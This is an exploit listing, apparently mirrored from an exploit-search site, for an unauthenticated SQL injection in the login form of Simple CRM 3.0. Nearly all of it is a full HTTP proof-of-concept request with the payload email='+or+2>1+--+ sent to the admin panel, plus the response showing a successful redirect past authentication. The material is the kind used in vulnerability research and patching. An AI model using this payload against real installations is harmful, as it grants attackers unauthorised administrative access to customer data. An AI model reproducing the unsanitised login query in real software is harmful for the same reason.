Exploit for Simple CRM 3.0 SQL Injection

Name: Exploit for Simple CRM 3.0 SQL Injection
Rating: 5 (200 reviews)
2021-06-23 | CVSS 0.1
## https://sploitus.com/exploit?id=PACKETSTORM:163254
# Exploit Title: Simple CRM 3.0 - 'email' SQL injection (Authentication Bypass)   
# Date: 22/06/2021  
# Exploit Author: Rinku Kumar (rinku191)  
# Vendor Homepage: https://phpgurukul.com/  
# Software Link: https://phpgurukul.com/small-crm-php/  
# Version: 3.0  
# Category: Webapps  
# Tested on: Apache2+MariaDB latest version  
# Description : Simple CRM suffers from SQL injection vulnerability, allowing an un-authenticated attackers to login into CRM admin panel.  
  
  
Vulnerable Page: /crm/admin/  
  
POC-Request  
-----------------------------------  
POST /scrm/crm/admin/ HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 35  
Origin: http://127.0.0.1  
Connection: close  
Referer: http://127.0.0.1/scrm/crm/admin/  
Cookie: PHPSESSID=oj0mohnmrt809ndld8pg1p9f14  
Upgrade-Insecure-Requests: 1  
  
email='+or+2>1+--+&password=&login=  
  
---------------------------------------  
POC-Response  
  
HTTP/1.1 200 OK  
Date: Tue, 22 Jun 2021 15:53:00 GMT  
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.33  
X-Powered-By: PHP/7.2.33  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
Content-Length: 48  
Connection: close  
Content-Type: text/html; charset=UTF-8  
  
<script>window.location.href='home.php'</script>